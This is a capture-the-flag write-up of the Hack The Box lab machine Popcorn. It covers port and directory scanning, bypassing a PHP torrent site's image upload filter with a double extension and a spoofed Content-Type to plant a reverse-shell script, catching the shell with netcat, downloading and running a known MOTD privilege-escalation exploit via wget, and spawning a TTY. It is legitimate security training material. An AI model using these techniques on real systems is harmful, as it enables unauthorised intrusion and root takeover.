Posts Hack The Box - Popcorn Writeup
Post
Cancel

Hack The Box - Popcorn Writeup

f0b6dc0baba4d7fb8abaefc48bbc020e.png

IPOSDifficultyRelease Date
10.10.10.6LinuxMedium15 March 2017

Enumeration

As with any machine on HackTheBox the first step is to run an nmap scan to find open ports and running services.

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
kali@kali:~/Desktop/Popcorn:~$ nmap -sC -sV  10.10.10.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-17 09:39 EDT

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_  2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open  http    Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.85 seconds

Working directory

While nmap is running we should create a directory to keep all of our files for this box organised. We can make a new folder on the desktop by running the command mkdir /home/kali/Desktop/Popcorn. Any commands on the local machine will be run from this directory unless stated otherwise.

HTTP

nmap revealed a web server on this box. Navigating to this box in a web browser reveals what looks like a web server start page.

Gobuster

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
kali@kali:~/Desktop/Popcorn:~$ gobuster dir -u http://10.10.10.6 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.6
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/17 09:43:53 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.hta (Status: 403)
/cgi-bin/ (Status: 403)
/index (Status: 200)
/index.html (Status: 200)
/test (Status: 200)
/torrent (Status: 301)
[ERROR] 2020/06/17 09:44:12 [!] Get http://10.10.10.6/server-status: net/http: request canceled (Client.Timeout exceeded while awaiting headers)
===============================================================
2020/06/17 09:44:12 Finished
===============================================================

Gobuster reveals a test and /torrent directory.

/test

Navigating to /test/ reveals a blank page.

/torrent/

Navigating to /torrent/ reveals a web app named Torrent Hunter.

e71624cc273344de1993423e5c51d63b.png

This web app looks like a platform for uploading, downloading and sharing .torrent files. Looking around the web app we can browse current torrent files on the plaform. There is only one record showing a Kali Linux torrent file. There is an upload torrent feature, however this requires registration. It seems like registration is open to public.

4344d1e3f89dc312c6ff866dcfea473b.png

Once registered, several attempts to upload a non torrent file was attempted, however it seems like the only file type allowed was a .torrent file.

255b884dbee85cd888340a6e598dda19.png

After uploading the .torrent file you are able to view the record on the website. There is an option to upload screenshots. This states that only jpg, jpeg, gif and png files are allowed for upload.

c299b8c150b89493f32ff558c883dcb0.png

Exploiting screenshot file upload (with BurpSuite)

Burp Suite will be used to modify the HTTP request of the file upload.

Get reverse shell script

Since the web app is using php as its server side language we need to find a script to establish a reverse shell. There are several options for this, but in this box, a web shell that comes with the standard Kali install will be used. This can be copied to the working directory with cp /usr/share/webshells/php/php-reverse-shell.php .

Configure the script

Once copied the file needs to be edited to reflect our local machines settings. This can be done by opening the php-reverse-shell.php file in a text editor and changing the IP Address and Port to your Kali IP address and port of choice.

Rename the script

To allow the file to pass file name checks it must be renamed first. The allowed file extensions are shown on the page. changing the name to php-reverse-shell.png.php allows us bypass this check. Files can be renamed easily using the mv command.

Open BurpSuite and proxy

To edit the request a BurpSuite proxy must be running to intercept traffic. This can be done simply by opening BurpSuite and setting our browser to proxy traffic through 127.0.0.1:8000.

Upload the script

With Burp now intercepting, the HTTP requests can be edited. Upload the file using the form and Burp should pop up into the foreground with a new request.

Edit the request

c5a19f39c9f55fd14860c0d68eb5c7ef.png

To allow the script to bypass any further file upload checks the Content-Type must be changed. Changing this line to Content-Type: image/png and pressing forward will send the edited request back to the browser.

If the upload has been successful the message below will show.

515ff090fbc6eb3485f7c649424aff6a.png

Establish reverse shell

With the payload uploaded, a reverse shell can be established.

Open netcat listener

To receive the reverse shell netcat will be used. A listener can be opened with nc -nvlp 4455. Changing the port number to the same as used in the script.

Running payload

Navigating to the page to view the torrent file the image as shown as an invalid image. However right clicking the image and opening in a new window will open the file and run the payload.

If successful the netcat listener should show the output below.

1
2
3
4
5
6
7
8
9
kali@kali:~$ nc -nvlp 4455
listening on [any] 1234 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.6] 55520
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
 17:10:45 up 33 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$

Privilege escalation

With a shell now established as www-data the user flag can be grabbed in the user folder. A method to esclate privileges further must now be found.

MOTD Exploit

In the users folder there is a MOTD file in the .cache folder.

Looking on searchsploit reveals an exploit for this using CVE-2010-0832.

1
2
3
4
5
6
7
8
kali@kali:~/Desktop/Popcorn$ searchsploit MOTD
--------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                           |  Path
--------------------------------------------------------------------------------------------------------- ---------------------------------
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)                       | linux/local/14273.sh
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)                       | linux/local/14339.sh
MultiTheftAuto 0.5 patch 1 - Server Crash / MOTD Deletion                                                | windows/dos/1235.c
--------------------------------------------------------------------------------------------------------- ---------------------------------

Copy the exploit

To quickly grab the exploit run searchsploit -m 14339.

Host the exploit

To copy the exploit on to the host a python web server will be used to host the exploit file. This can be started by opening a terminal session and running python3 -m http.server.

Download the exploit

On the reverse shell session run wget http://10.10.14.18:8000/14339.sh replacing the IP address with your local machine.

Set file permissions

To enable the script to execute run chmod +x 14339.sh

Run the exploit

Before the exploit can be run the shell session must be upgraded to full TTY. This can be done by several methods. A python one liner is used in this instance.

1
python -c "import pty; pty.spawn('/bin/bash');"

With a TTY session now running the exploit can be executed by simply running the file with ./14339.sh.

If successful, running whoami will reveal that the current session is running as root.

The root flag can be found in the /root folder.

Looking through the users home folder

This post is licensed under CC BY 4.0 by the author.